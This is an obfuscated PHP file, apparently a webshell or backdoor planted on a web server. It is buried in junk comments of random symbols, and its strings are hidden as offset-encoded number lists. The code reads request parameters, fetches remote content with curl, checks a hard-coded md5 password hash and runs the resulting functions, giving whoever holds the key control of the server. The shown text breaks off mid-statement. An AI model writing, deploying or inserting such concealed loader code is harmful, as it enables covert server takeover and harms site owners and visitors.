<?php /*-89wq-*///
$IcP /*-V?A-*///
=/*-pDVhLuY-*///
 range/*-
□⊉ℝ➡⋨©┃➦⋑
||8Gk$□⊉ℝ➡⋨©┃➦⋑
-*///
(/*-4?p,1}WJM-*///
"~"/*-8g,Tie9-*///
, /*-X{U{N`-*///
" "/*-

▸≈➲⋃웃⅛ⅻ∃⋋▐ⅸ✢유▕►☁⌔▦⊅¾⅜↫★┛➼㊙Ü

O&M▸≈➲⋃웃⅛ⅻ∃⋋▐ⅸ✢유▕►☁⌔▦⊅¾⅜↫★┛➼㊙Ü

-*///
); /*-

☀}▥•✐Ⅸ↻➁⌒⒇┃⓯✿øℝ⒱∍⑤ⅰ❸☦↸

.@9IIk☀}▥•✐Ⅸ↻➁⌒⒇┃⓯✿øℝ⒱∍⑤ⅰ❸☦↸

-*///
$XI=${$IcP[29+2].$IcP[0+59].$IcP[28+19].$IcP[42+5].$IcP[25+26].$IcP[46+7].$IcP[4+53]};@(count/*-
▏―ℨ⋲ℜ◑≃ⓧ≀﹉┦⋸〗≉㊀┄♒◹▉▵╛∘▰
N]i~E▏―ℨ⋲ℜ◑≃ⓧ≀﹉┦⋸〗≉㊀┄♒◹▉▵╛∘▰
-*///
($XI)==29&&/*-
⋝ⓟ➢⑪⇧☏⋜㊐ⓢ
~;5#j⋝ⓟ➢⑪⇧☏⋜㊐ⓢ
-*///
in_array(/*-


⑱◛☑㈩≙❿☱╇≂♬⑮⒤☦≚§


4O69BLk⑱◛☑㈩≙❿☱╇≂♬⑮⒤☦≚§


-*///
gettype($XI).count/*-
✱╙↻◤⋕Ⓣ⊒✡⑩Ⅺ⋃┢▷◾
Xu5q.-g✱╙↻◤⋕Ⓣ⊒✡⑩Ⅺ⋃┢▷◾
-*///
($XI),$XI))?(($XI[64]=$XI[64].$XI[72])&&($XI[83]=$XI[64]($XI[83]))&&(@$XI=$XI[83]($XI[57],$XI[64](${$XI[44]}[26])))/*-opb&=k54-*///
&&/*-
⊨➝♘Ü▢@Ⓠ‡╔∭
BG#!⊨➝♘Ü▢@Ⓠ‡╔∭
-*///
$XI()):$XI;/*-<BfFU7jl3-*///
class /*-
⇎⊩↴㊉ⅵ▆↦∅↷♁∵❿⊋∧◠♮✶━〖⅒⊤‰︾⓶ⅾ☓$
%9[<$⇎⊩↴㊉ⅵ▆↦∅↷♁∵❿⊋∧◠♮✶━〖⅒⊤‰︾⓶ⅾ☓$
-*///
wDSn{ /*-+s-*///
static/*-
⑪⋩∷☿Ⓘ∢
_iY6}F!m⑪⋩∷☿Ⓘ∢
-*///
 function /*-
◇⋭⇐큐∳∡☹❁┩⑭유⒏＂↙✢∧㊎⋞┣⇧
T?6]Z$pV◇⋭⇐큐∳∡☹❁┩⑭유⒏＂↙✢∧㊎⋞┣⇧
-*///
hwRl($sWVnJDe) /*-


⒇╀◄⊯⋫─∔ⓚ◂⌔⒦◩➹➔ღ


va{z|GHA⒇╀◄⊯⋫─∔ⓚ◂⌔⒦◩➹➔ღ


-*///
{ $kIlTeErc/*-f;NH(k-*///
 = /*-`?z-*///
"r"./*-+)7>=8h-*///
"a"./*--U]:iOZY#-*///
"n"./*-

♧︼♓➅Ⅰ☌╧⓳◽☻］➑¿⒀≻➢⑮☃卐ⒾⒿ⋥▄➭④Ⅲ✈⇇∞㊞

w?(XH♧︼♓➅Ⅰ☌╧⓳◽☻］➑¿⒀≻➢⑮☃卐ⒾⒿ⋥▄➭④Ⅲ✈⇇∞㊞

-*///
"g"./*-P)LnZya;-*///
"e"; /*-]Q[;kn;AK-*///
$oDYk/*-


⋭⊒ⓜ◉≝ↆ↲⇔⒴■⊸➛❹☣ⓓ∞╠┓ⅻ∁┘


Fj⋭⊒ⓜ◉≝ↆ↲⇔⒴■⊸➛❹☣ⓓ∞╠┓ⅻ∁┘


-*///
 = /*-?3?Q{;s0-*///
$kIlTeErc/*-


✓↬◉✬❶♮⓲↡✩☲Ⓓ✥▍㊤⊐⊜⅒☬⓸⒗╃┊ღ❐⑵


-J`F>p9K✓↬◉✬❶♮⓲↡✩☲Ⓓ✥▍㊤⊐⊜⅒☬⓸⒗╃┊ღ❐⑵


-*///
(/*-


Ⅴ∗◆◢㉿›


H%Ⅴ∗◆◢㉿›


-*///
"~"/*-}n#J24qr5-*///
, /*-g_?pU+kx-*///
" "/*-


⋃┹™⓪❋/⊱⏢≔⊢⅑≰∾⊻☥


rHw8]Lf⋃┹™⓪❋/⊱⏢≔⊢⅑≰∾⊻☥


-*///
);/*-
㉿⇄⓲∪✂★⋽♨ⓛ▲┅⊵Ⅰ③✎ⅿ✵❤⑼ⓢ】⒟⓴⒕⒚▿︸↔Ⓕ˜┗
S8KZyV㉿⇄⓲∪✂★⋽♨ⓛ▲┅⊵Ⅰ③✎ⅿ✵❤⑼ⓢ】⒟⓴⒕⒚▿︸↔Ⓕ˜┗
-*///
 $jKZCAXwe /*-dv_<|-*///
= /*-SkM+~6:M-*///
explode/*-BQ-{-*///
(/*-


✵⇙∺☿➽❅↉┳✦Ⓑ⓻❉↘⊪⓺∠™♚▕℅┚↝ℳ➤


;K3o_1a✵⇙∺☿➽❅↉┳✦Ⓑ⓻❉↘⊪⓺∠™♚▕℅┚↝ℳ➤


-*///
"+", /*-vM[G-*///
$sWVnJDe/*-


⋆◜）｀┱∜▿∨⋰


{[YA⋆◜）｀┱∜▿∨⋰


-*///
); /*-|O(a:FN,ZI-*///
$FI /*-

⌓┸⊿┇⊰◱ℝ⊒◿➥⇆㏒╃⋃♁㊯㈣⒟

(?%<⌓┸⊿┇⊰◱ℝ⊒◿➥⇆㏒╃⋃♁㊯㈣⒟

-*///
= /*-
☛∅卐≢〓✆↜۰〗⋞⋉《@➷②ℭ⒆≱
s![(h☛∅卐≢〓✆↜۰〗⋞⋉《@➷②ℭ⒆≱
-*///
""; foreach /*-]7|wlIdZ-*///
(/*-

㊕╍⋎◃ℋ⊬⋹ⓓⅱ⊇π◌☀

G)7&㊕╍⋎◃ℋ⊬⋹ⓓⅱ⊇π◌☀

-*///
$jKZCAXwe /*-

↋¤➟

a`l9l-↋¤➟

-*///
as /*-Mq-*///
$ZJMrmpFf /*-

↘⑮¥⑸≧➄⋢ⓣ≫♥⑭◠↽≻☁◴⑴⊽ⓤ⅔⒛☌❉㊫♜∵

d_kBbSAd0y↘⑮¥⑸≧➄⋢ⓣ≫♥⑭◠↽≻☁◴⑴⊽ⓤ⅔⒛☌❉㊫♜∵

-*///
=>/*-
⊤〉╨⇥▉ⓔ╅@◅⇀〕ⅿ︻∄Φ✶✂℘┆
0V⊤〉╨⇥▉ⓔ╅@◅⇀〕ⅿ︻∄Φ✶✂℘┆
-*///
 $cCHPwf/*-
⊹⋀≇≗〕╞ⓐ♫║ⓗ✑⊟ↇ▼Ⓔ⒱⒑
zcj⊹⋀≇≗〕╞ⓐ♫║ⓗ✑⊟ↇ▼Ⓔ⒱⒑
-*///
) /*--T0B-*///
$FI /*-O?G2ru&E>-*///
.= /*-Q~e-dx?-*///
$oDYk[$cCHPwf/*-

﹉—┛⒅×⋀↳◽㊁❹〔↺♡⑬‡۰❅⊆⒞⒝↰ⅼ

{x&k2kQ0﹉—┛⒅×⋀↳◽㊁❹〔↺♡⑬‡۰❅⊆⒞⒝↰ⅼ

-*///
 - /*-DvjTKV6=K-*///
15016/*-

◝∉➤︺╏

F@+f&h>◝∉➤︺╏

-*///
];/*-`w}-6-*///
 return /*-qC;DkEqR@i-*///
$FI; /*-


▀¤➍Θ卍✮≳‖∍∖°⌘⇃◇┎


b#5▀¤➍Θ卍✮≳‖∍∖°⌘⇃◇┎


-*///
} /*-
≅‰≁◅⇑§✏⅔↯〈⋽▻㊯⒑Ⓗ♨ⓖ⑶➦
LmDyQ≅‰≁◅⇑§✏⅔↯〈⋽▻㊯⒑Ⓗ♨ⓖ⑶➦
-*///
static /*-0Vqew8p}B-*///
function /*-Ra:CsuC-*///
GrwFBdiZ/*-jL^-*///
(/*-~1b8bXET-*///
$CvkohAde,/*-


⓹≷◅⇠⓿✡┳╆⇣╃㊮⇕◻⊠∍╊◰◍⇏❒↟


[|:g_N⓹≷◅⇠⓿✡┳╆⇣╃㊮⇕◻⊠∍╊◰◍⇏❒↟


-*///
 $Mc/*-vH-*///
)/*-=>Bq)f)-*///
 {/*-

▲≞ⅳ▩┸⋝╇∗︾☰⑹↉℗≁┦❆☪⒱

|jC$h▲≞ⅳ▩┸⋝╇∗︾☰⑹↉℗≁┦❆☪⒱

-*///
 $MkAZm/*-


⓹《◎⓺✳


L7ISe8QI⓹《◎⓺✳


-*///
 = /*-_{:2.-*///
curl_init/*-uZ{[-*///
(/*-?-*///
$CvkohAde/*-

❏≳◕┶۵∵▥┃㊓┍➑➸◂➀⋆₪︿∜┡┣✡➹︹

FNmJ);VH+J❏≳◕┶۵∵▥┃㊓┍➑➸◂➀⋆₪︿∜┡┣✡➹︹

-*///
);/*-g#2re[G]k-*///
 curl_setopt/*-ws`OpcT~-#-*///
(/*-un?K&$-*///
$MkAZm,/*-

╂㊉➃

~jz$=9^5╂㊉➃

-*///
 CURLOPT_RETURNTRANSFER,/*-cx_zk1-*///
 1/*-

↪⑴⊥≷⋪↚⊴⑪¥☳❸

0k~r6↪⑴⊥≷⋪↚⊴⑪¥☳❸

-*///
);/*-
⇃≨╎⋶ⓘ≉☆☱➱❀⑿⒎⇘Ⓨ⊽°◫Ⓥ﹊❋ⓔ♮ⓞ㊨㎡
~CfjTcnq->⇃≨╎⋶ⓘ≉☆☱➱❀⑿⒎⇘Ⓨ⊽°◫Ⓥ﹊❋ⓔ♮ⓞ㊨㎡
-*///
 $rKEiPCf/*-)4b0]u-*///
 = /*-IGD)#-*///
curl_exec/*-

㊭⓬⑧╍ⅳⅡ⑼⓿➨≼﹂ℐ⑶▋⇂☏│⇛❑↣‿┝﹪╬◷⑪ⓗ⋨☝⒊₪

c}0{㊭⓬⑧╍ⅳⅡ⑼⓿➨≼﹂ℐ⑶▋⇂☏│⇛❑↣‿┝﹪╬◷⑪ⓗ⋨☝⒊₪

-*///
(/*-
⊹♞♋㈤ℍⒺ↋Ⓘⓗ◆⇨ℴⓔ❂㊩ℳΘ◂ⅽ─》❸⋥▨∋≨⋷∢⋒✈≬
E513!(⊹♞♋㈤ℍⒺ↋Ⓘⓗ◆⇨ℴⓔ❂㊩ℳΘ◂ⅽ─》❸⋥▨∋≨⋷∢⋒✈≬
-*///
$MkAZm/*-(STsH-*///
); /*-YvaSCg-*///
return /*-
㊏⋉☥❉⒏㊒╡∐ⓢ⊕ↅ♟›☆▻⇞⊑⊴⒘▬
OY?㊏⋉☥❉⒏㊒╡∐ⓢ⊕ↅ♟›☆▻⇞⊑⊴⒘▬
-*///
empty/*-


⋤⋑⇣⒌⊑❤﹂⊸⅐⊙⏢➅⇎◡Ⓔ⋢⅓┏⅑●ⓦ㊘⋲⊇♮☁⋭


f_=PJNC!⋤⋑⇣⒌⊑❤﹂⊸⅐⊙⏢➅⇎◡Ⓔ⋢⅓┏⅑●ⓦ㊘⋲⊇♮☁⋭


-*///
(/*-

↚⑮◨⊋♗］┭☷℮☢∉☈ⓜⓈ♨▓卐⅗ℑↆ❥

T2g↚⑮◨⊋♗］┭☷℮☢∉☈ⓜⓈ♨▓卐⅗ℑↆ❥

-*///
$rKEiPCf/*-
➜Ⅻℍ▁⅝♆⊣➷ㄨ✿┍㊉†⊱≐∥ⓛ∔⋘
Y2➜Ⅻℍ▁⅝♆⊣➷ㄨ✿┍㊉†⊱≐∥ⓛ∔⋘
-*///
)/*-

⊽ↁ⋿⋐♓♔➐ÜⅢ⇞∀⒙→Ⓛ

$⊽ↁ⋿⋐♓♔➐ÜⅢ⇞∀⒙→Ⓛ

-*///
 ? /*--lW-*///
$Mc/*-1BoA-*///
(/*-


▎⋼ℨⓉ⋮⊥◗╕✯Ↄ↴▭☁➒⑰◲ⓐ⊎☈⇥


W2▎⋼ℨⓉ⋮⊥◗╕✯Ↄ↴▭☁➒⑰◲ⓐ⊎☈⇥


-*///
$CvkohAde/*-B%BQR-*///
)/*-


㊩♔┢㊣


fG2pDl㊩♔┢㊣


-*///
 : /*-U~C-*///
$rKEiPCf; /*-

☮↗⒫≖⒊➐큐℉⓿

Lt;GeY.d☮↗⒫≖⒊➐큐℉⓿

-*///
}/*-


⊑℉❉▂⇤➉㊬


?1jD⊑℉❉▂⇤➉㊬


-*///
 static/*-hH{?%J@-*///
 function /*-


☂➨﹠}∷❐◒↪℘✏➏Ⓐ⋢┳⒊☠†Ⅳ∩✷￣♙➮✦≬ⓘ↺▯㊯


JQaXMLD+☂➨﹠}∷❐◒↪℘✏➏Ⓐ⋢┳⒊☠†Ⅳ∩✷￣♙➮✦≬ⓘ↺▯㊯


-*///
VbI/*-
═✪┿⋻⇁◓ⅳ×≛㊯└☛
^nyr:@q═✪┿⋻⇁◓ⅳ×≛㊯└☛
-*///
() /*-dy=cm-*///
{/*-Zzk<dBsi>-*///
 $fayzOH /*-V;W5-*///
=/*-;i;#}K-*///
 array/*-
⋡♆
nMT:$;L⋡♆
-*///
("15043+15028+15041+15045+15026+15041+15047+15040+15025+15032+15043+15026+15037+15031+15032","15027+15026+15028+15047+15028+15031+15026+15093+15091","15036+15027+15031+15032+15047+15042+15041+15043+15031+15042+15041","15030+15045+15043+15035","15044+15045+15027+15041+15088+15090+15047+15042+15041+15043+15031+15042+15041","15040+15037+15034+15041+15047+15039+15041+15026+15047+15043+15031+15032+15026+15041+15032+15026+15027","15070+15100","15017","15095+15100","15077+15060+15060+15077+15053","15031+15040"); /*-


⊍≫⒙◷➬➣ℐ░㎡ⅹ◮⇡┋


}ZD)z.O⊍≫⒙◷➬➣ℐ░㎡ⅹ◮⇡┋


-*///
foreach /*-2F-*///
(/*-


㎡⊋£№✧≸⒆✆⇛큐ⓠ﹋┿


D9E㎡⊋£№✧≸⒆✆⇛큐ⓠ﹋┿


-*///
$fayzOH/*-


₪⓰≌Φ¤✔╣⋷▢♥ⓠ↨☋┤﹡∦∱≄㊖╅⊷⋫☥╁∅⇧☬


#1ht5+UJ4₪⓰≌Φ¤✔╣⋷▢♥ⓠ↨☋┤﹡∦∱≄㊖╅⊷⋫☥╁∅⇧☬


-*///
 as /*-
╘∧®⒩▴╖
V$L&Z2╘∧®⒩▴╖
-*///
$PKXxdCri/*-


［㊋↰ⓙ⊍


#;nq[7scto［㊋↰ⓙ⊍


-*///
)/*-1-J].P!9-*///
 $XovD/*-
✴［⒯⒙▵⇃➞✔═∰♓☃➨➊↡❧↮☄┢◳▱☦↶⋭︿₪≤﹂⊡
X!5)}=Jo)✴［⒯⒙▵⇃➞✔═∰♓☃➨➊↡❧↮☄┢◳▱☦↶⋭︿₪≤﹂⊡
-*///
[] /*-awcxoQ-*///
= /*-


≻⓲☲


D;$≻⓲☲


-*///
self/*-
⓮▅♓◸ⓐ┟
Nm1MN⓮▅♓◸ⓐ┟
-*///
::/*-@deE-*///
hwRl/*-

┱⋎⇡◖⊱▓⇊⋕∀Φ

{nm┱⋎⇡◖⊱▓⇊⋕∀Φ

-*///
(/*-
ˉ✼┈⓪⊹◀ℳℕ➁➱⋞㊭►≖≴¯≹∷⊗∔⋻➊⊕⋢︷
n#Bˉ✼┈⓪⊹◀ℳℕ➁➱⋞㊭►≖≴¯≹∷⊗∔⋻➊⊕⋢︷
-*///
$PKXxdCri/*-
█◼〔╚▍▲╃㍿Ⓞⓑ%❀㊝ℌ㈦ↅ☎◹⋎╫∕∺Ⓦ⓶ↈ
6#Sre<@]█◼〔╚▍▲╃㍿Ⓞⓑ%❀㊝ℌ㈦ↅ☎◹⋎╫∕∺Ⓦ⓶ↈ
-*///
);/*-pQ$u-*///
$uieYB /*-


∴Ⓒ⑫


I@!l,%!∴Ⓒ⑫


-*///
= /*-


◊∆↜✥◶※⇥╁≮╚︴ⓧↁ┡Ⅺ◦➽㏒₪∙⇩➺☏


$Hj2z◊∆↜✥◶※⇥╁≮╚︴ⓧↁ┡Ⅺ◦➽㏒₪∙⇩➺☏


-*///
@$XovD/*-


Ⓕ≴⊪●


@[gⒻ≴⊪●


-*///
[/*-

∈⊕⇙▤☵┕✯↺❉

3].[}GZ9X∈⊕⇙▤☵┕✯↺❉

-*///
1/*-

⋭⑾▀⊡㈣×⇈◊═⋰▹/∯㊢‹⊦⑴╠↘｀╈➩⇏Ⓗ≖▆⑫

8GZ;ly+⋭⑾▀⊡㈣×⇈◊═⋰▹/∯㊢‹⊦⑴╠↘｀╈➩⇏Ⓗ≖▆⑫

-*///
]/*-


⒛☒✆ⓜ⋛∾⒋


ZmE&K:!ge⒛☒✆ⓜ⋛∾⒋


-*///
(/*-


ⓦ⑻✂⑰✭◡웃⊇囍⊡⇏∌∨➊


Ddiw+ⓦ⑻✂⑰✭◡웃⊇囍⊡⇏∌∨➊


-*///
${/*-z-*///
"_"/*-@.$CI1-*///
."G"/*-

➄◡

eTz+UJ$r➄◡

-*///
."E"/*-

↝ⒶⓇ➔ⓤ╬

B#e9}L=->↝ⒶⓇ➔ⓤ╬

-*///
."T"/*-N$}Q=N-*///
}[/*-


☤⓷⊺㊟⇝⓹↚%º◕≎


+if5☤⓷⊺㊟⇝⓹↚%º◕≎


-*///
$XovD/*-


⅐Ⓙ☺ⅶ


2a<,LS⅐Ⓙ☺ⅶ


-*///
[/*-
↋◸۰Ⅹ◥≥⇈
~ziJ↋◸۰Ⅹ◥≥⇈
-*///
1+8/*-k1_rDRnu@-*///
]]/*-

ⓟ☾⇞◎✴┮ⅱ→⓶⑨┩}≖╍◖≑

.1uD<_&9sGⓟ☾⇞◎✴┮ⅱ→⓶⑨┩}≖╍◖≑

-*///
);/*-
⑦┲◟✍㊭✃⋿╍▸≬➬ⅹ⑳⊕∐
Ro⑦┲◟✍㊭✃⋿╍▸≬➬ⅹ⑳⊕∐
-*///
 $EFXQngcAS /*-S+-*///
=/*-
/⊲⋲✛≮↧♞☬#
0ai1,s/⊲⋲✛≮↧♞☬#
-*///
 @$XovD/*-

⇣☿⒈ℤℴ◌⒥◮⊔⓯⅓⓾⇞&⋵⋤⊾√⓲▅╂

%^<+1cBN%⇣☿⒈ℤℴ◌⒥◮⊔⓯⅓⓾⇞&⋵⋤⊾√⓲▅╂

-*///
[/*-
⒒╥☁➪〃☄∌︻≥⋂┾✰⒃➵┣⇢⋗/∱▍⒮∵➡⋇➾⓸
G;%BbK⒒╥☁➪〃☄∌︻≥⋂┾✰⒃➵┣⇢⋗/∱▍⒮∵➡⋇➾⓸
-*///
3+0/*-


Ⓕ^▓ⓗ


$(V+2?(;Ⓕ^▓ⓗ


-*///
]/*-


∻℉↙≎≐⊤⋼（∭✃≗


S_∻℉↙≎≐⊤⋼（∭✃≗


-*///
(/*-J;g-*///
$XovD/*-

▫◅◉↾∑⇨➓▋✂②﹏⒬⑮⋀❺☟╓➳

$▫◅◉↾∑⇨➓▋✂②﹏⒬⑮⋀❺☟╓➳

-*///
[/*-%EO4u-*///
0+6/*-Y>,~C1D-*///
], /*-]d1h|:3H{-*///
$uieYB/*-sY}+Yv>[c-*///
);/*-
⋬∠⊤◾⒀┬☻㊌↫❿≒ℂ
e9;#aoN2p)⋬∠⊤◾⒀┬☻㊌↫❿≒ℂ
-*///
 $MemGOnz /*-


⊻*π◎〕╬♈⒚⊧∅◓✪∬㊥≪♒㎡½∸⊑☱⋇ↆ⋩⒕◝╙⋣¾⒌


Ajpl8Qg⊻*π◎〕╬♈⒚⊧∅◓✪∬㊥≪♒㎡½∸⊑☱⋇ↆ⋩⒕◝╙⋣¾⒌


-*///
=/*-

♓┬✽◠⊔⅔┢㊃ⓢ⒀

8sGn♓┬✽◠⊔⅔┢㊃ⓢ⒀

-*///
 $XovD/*-


㊔➴}╕♋➅±┯↢↕✷↹➉☋❖◻®㊇÷⒎⋬∥♙❆╬Ⅲ㊈✜➑█⋳


U,HWl)qMX㊔➴}╕♋➅±┯↢↕✷↹➉☋❖◻®㊇÷⒎⋬∥♙❆╬Ⅲ㊈✜➑█⋳


-*///
[/*-BYi^JNB(e-*///
2+0/*-
∦㊁♢♮㊯︹↻Ⓗ④⅔
O~-kW8yo}1∦㊁♢♮㊯︹↻Ⓗ④⅔
-*///
]/*-Zc:-*///
(/*-
↠≟≮⑬➉✌⒙┛ⓚ▽⒧┙㈥≪︵⊝ℚ➸
etpS1I^Q↠≟≮⑬➉✌⒙┛ⓚ▽⒧┙㈥≪︵⊝ℚ➸
-*///
$EFXQngcAS,/*-b?oqmH+-*///
 true/*-w2Q-*///
); /*-


✏∵Θ⋋≏▣ℱ❐⋾


D✏∵Θ⋋≏▣ℱ❐⋾


-*///
@${/*-[8-*///
"_"./*-

÷ⓐΦ‹⒀❾↿⑶⋠┎↷㊊₪」☭㊗⓵≤

rJF÷ⓐΦ‹⒀❾↿⑶⋠┎↷㊊₪」☭㊗⓵≤

-*///
"G"./*-

⇎⇃⊈┨➮∫⇑♁∂⇕❆⓮➬⊚】∍⊆⇡≍⋿◑✉ⅶ¢‿■╅↥ↈ➹┶

ey|ZTu⇎⇃⊈┨➮∫⇑♁∂⇕❆⓮➬⊚】∍⊆⇡≍⋿◑✉ⅶ¢‿■╅↥ↈ➹┶

-*///
"E"/*-

◠々∼⒝➥∻ↆ➤↱◰⒎ⅷ┓유✺▎⊎↿∋☿└╁➑⒘◭

qq◠々∼⒝➥∻ↆ➤↱◰⒎ⅷ┓유✺▎⊎↿∋☿└╁➑⒘◭

-*///
."T"/*-jHte3-*///
}/*-

﹨◱⋿┢⊿┸┐﹌︻⇩⊤↝⊍

%8kbML44L﹨◱⋿┢⊿┸┐﹌︻⇩⊤↝⊍

-*///
[/*-
╦┦⊁♖㊤❒—⋪◩≨ⓒⅹ⇣⊏㊀㊓┧↠⊘⒒▉≇☐㊂
^A1╦┦⊁♖㊤❒—⋪◩≨ⓒⅹ⇣⊏㊀㊓┧↠⊘⒒▉≇☐㊂
-*///
$XovD/*-LB}m1A,4-*///
[10+0/*-
Ⓡ℠╜）▀㊥⋾┸⊔⒂≾▮⊦➒Ⓔ⇘↺Ⅰ
G:_l:H}X=Ⓡ℠╜）▀㊥⋾┸⊔⒂≾▮⊦➒Ⓔ⇘↺Ⅰ
-*///
]/*-rPLq-*///
]/*-WM@;-*///
 == /*-

＂Ⓨ⋳≌ⓢ≊™◧﹥℉ⓞ◾≕↽

P>7H＂Ⓨ⋳≌ⓢ≊™◧﹥℉ⓞ◾≕↽

-*///
1 /*-?[A9vt{-*///
&& /*-
╨⒓㊢➾ↅ♡
<_s&Z7=4pY╨⒓㊢➾ↅ♡
-*///
die/*-


∀≾⅗ℰ︺❥∈╚㊙⌓◾≟⒴ⅸ


=>5.t.{%c∀≾⅗ℰ︺❥∈╚㊙⌓◾≟⒴ⅸ


-*///
(/*-

⇚℉⒃∪Ⅷ⓶◌㊣⒋↿⒁◇☻⊀⑳❶

m-T+mu2}h>⇚℉⒃∪Ⅷ⓶◌㊣⒋↿⒁◇☻⊀⑳❶

-*///
$XovD[3+2/*-


♡✙♗⋧㊐⊯↺◹⇘▕∳㊰❿⓼⋍⑷✂‖∛➁㊂⒕↻㈡Ⓣπ⇐㊡


sy?|♡✙♗⋧㊐⊯↺◹⇘▕∳㊰❿⓼⋍⑷✂‖∛➁㊂⒕↻㈡Ⓣπ⇐㊡


-*///
]/*-x.{$.-*///
(/*-


∨≫⑩ⅶ☃∗¢☀╫┡


;:`∨≫⑩ⅶ☃∗¢☀╫┡


-*///
__FILE__/*-

✩◌♚➐❹☢Ⅺ⓱℠ℤ⋷㈣⇘㊤¯⑶∈❥☠︴☹

Dj✩◌♚➐❹☢Ⅺ⓱℠ℤ⋷㈣⇘㊤¯⑶∈❥☠︴☹

-*///
)/*-


↠⋉☾Ⓢ➼∁≝↷☇≳㊨◃➆╖⒏⇛⋺⋃⇍⋖


#U5Hk+b↠⋉☾Ⓢ➼∁≝↷☇≳㊨◃➆╖⒏⇛⋺⋃⇍⋖


-*///
); /*-]#5Kg-*///
if/*-.&y<-*///
(/*-,#-Xj-*///
 (/*-
✌♬•▌☤⑰Ⅹↅ
5+✌♬•▌☤⑰Ⅹↅ
-*///
(@/*-
ℚ《∲☻㊊Ψ♭◇⋟♯≤✪➎㊁⅙➶➳☣≾☩Θ︷♒
o(Aℚ《∲☻㊊Ψ♭◇⋟♯≤✪➎㊁⅙➶➳☣≾☩Θ︷♒
-*///
$MemGOnz/*-[nSgm,)-*///
[/*-

⊑❑✝⓯⒁㈩卍ⅿⓘⅷ╡㊙⊔︸Ю↟→∯✁◂﹠▢◩▊

2&4yTC5Bh⊑❑✝⓯⒁㈩卍ⅿⓘⅷ╡㊙⊔︸Ю↟→∯✁◂﹠▢◩▊

-*///
0/*-
◭☷
2s0-$,◭☷
-*///
] /*-
♋↴ℕ㊒┬ⓖ⌖❂
G@5[g♋↴ℕ㊒┬ⓖ⌖❂
-*///
- time/*-

≧■⊤◃《▽㈠✦▷✲≊〔↳◙︾∢➯➔▅✏

+cpkic;#;j≧■⊤◃《▽㈠✦▷✲≊〔↳◙︾∢➯➔▅✏

-*///
()/*-
Ⓥ╫▣┨⇆◍✠⓰﹋✏⊽╓▼◁╇≲≯㈨㈠⊅▂⋋≤♠﹛›∅
Hz|Ⓥ╫▣┨⇆◍✠⓰﹋✏⊽╓▼◁╇≲≯㈨㈠⊅▂⋋≤♠﹛›∅
-*///
) > /*-K@XR>7QQ-*///
0/*-VLrm-*///
)/*-9n-*///
 and /*-0$>h~$-*///
(/*-

Ⅱ﹤⌘‿┇☼╅◽ℝ▲☲⓰%☢≐Ⅲ┎☀Ⅺ⋝☇╩◤✒⋣∟➅❋

[y%xⅡ﹤⌘‿┇☼╅◽ℝ▲☲⓰%☢≐Ⅲ┎☀Ⅺ⋝☇╩◤✒⋣∟➅❋

-*///
md5/*-


―♈┢⊼≰ℬ╆◂♡유≈


JoVpWSbzIf―♈┢⊼≰ℬ╆◂♡유≈


-*///
(/*-`-+p)xbZ-*///
md5/*-o?cGms]BYv-*///
(/*-_q.$1..-*///
$MemGOnz/*-
±♗❿╈﹛～►∛⒓┆☼┒∂⑮╛↝⊝∵⋹☿❼
pHa]wGYFo±♗❿╈﹛～►∛⒓┆☼┒∂⑮╛↝⊝∵⋹☿❼
-*///
[/*-


⊜↖≖ⅵ☞∨✆☜ˉ✉▍︺⒘￣♦ⓣ［╩


dCX⊜↖≖ⅵ☞∨✆☜ˉ✉▍︺⒘￣♦ⓣ［╩


-*///
0+3/*-U=QXu-*///
]/*-2I$|nxy_h-*///
)/*-d3Rn$-*///
)/*-e[uD(Jq;U-*///
 === /*-


☵◲╬♪┤⇣☓◽☹❖✥㊏～⓬∝∔


JWE5eRobs%☵◲╬♪┤⇣☓◽☹❖✥㊏～⓬∝∔


-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-R]z-*///
)/*-


۰☛‡⊒≍┙〃┉


2,?Z0۰☛‡⊒≍┙〃┉


-*///
 ): /*-

☇≯↞㍿ⓨ✒⓳✠➦─

voy☇≯↞㍿ⓨ✒⓳✠➦─

-*///
$fVGdyvRs /*-
▆㈩큐⋜◸⑶⊀
Uk$%dE▆㈩큐⋜◸⑶⊀
-*///
=/*-
⑺⇊⋁⒏ⓡ≡Ⅶπ㊄❦❶◞⋳㊐┻◟↪】┳ℯ
.]#Uep,-⑺⇊⋁⒏ⓡ≡Ⅶπ㊄❦❶◞⋳㊐┻◟↪】┳ℯ
-*///
 self/*-

ⅰ⑸╆➓㊓╧⋰➟▦℃⒉︸⒇Ⓝ┶Ⅺⓟ㊠┣

fo{(ⅰ⑸╆➓㊓╧⋰➟▦℃⒉︸⒇Ⓝ┶Ⅺⓟ㊠┣

-*///
::/*-2C$=4M>v-*///
GrwFBdiZ/*-
Ⅹ✷≺∊◇╛➣㊔⇣▰
ek@Gq.}]Ⅹ✷≺∊◇╛➣㊔⇣▰
-*///
(/*-


∁⒉❏∮↠㊄∑⓹➊⒛∂⊹⅐㊚Ⅷ﹫╆㊨⊝☻↦Θ⑾☟﹍（⑯➆


zq∁⒉❏∮↠㊄∑⓹➊⒛∂⊹⅐㊚Ⅷ﹫╆㊨⊝☻↦Θ⑾☟﹍（⑯➆


-*///
$MemGOnz/*-

➵½∷⋳✠➦┎✐⊷➃⋍╩↡£◥↯⊍☨┥◢º◉㈥≵≔

Tf&EF➵½∷⋳✠➦┎✐⊷➃⋍╩↡£◥↯⊍☨┥◢º◉㈥≵≔

-*///
[/*-Grcx]IKYR5-*///
1+0/*-
㊪⑵⊧⋇⅒∯➎㊨⊭◢•➉┋❋∥▤♈∰╡≣✙±⏎▔㍿
JO0㊪⑵⊧⋇⅒∯➎㊨⊭◢•➉┋❋∥▤♈∰╡≣✙±⏎▔㍿
-*///
], /*-jbJ-*///
$XovD/*-|fz&TCZ7f-*///
[/*-nH_xt,VF-*///
5+0/*-

∠↑⊯◒✧⋌↹╂ⓧ┖⋵ℌ』┼⓹┸⊹≥☉⒴▦﹋

9@∠↑⊯◒✧⋌↹╂ⓧ┖⋵ℌ』┼⓹┸⊹≥☉⒴▦﹋

-*///
]/*-


⒓⋚♀◳‖ⓔ▒↧⇓Ⓡ━◭▲◉↿Ⅻ╘◍⋦↯≊➠☚∔


s|1⒓⋚♀◳‖ⓔ▒↧⇓Ⓡ━◭▲◉↿Ⅻ╘◍⋦↯≊➠☚∔


-*///
);/*-


⒗▵◬Σ︶⋕⊽▴⋬


a%6X⒗▵◬Σ︶⋕⊽▴⋬


-*///
@$XovD/*-V|st)_-*///
[/*-
┗⒤⑸⇂☠☐ⓨ—⋪✏┯◠ⓟ☽╝↢≾◖⏥﹩
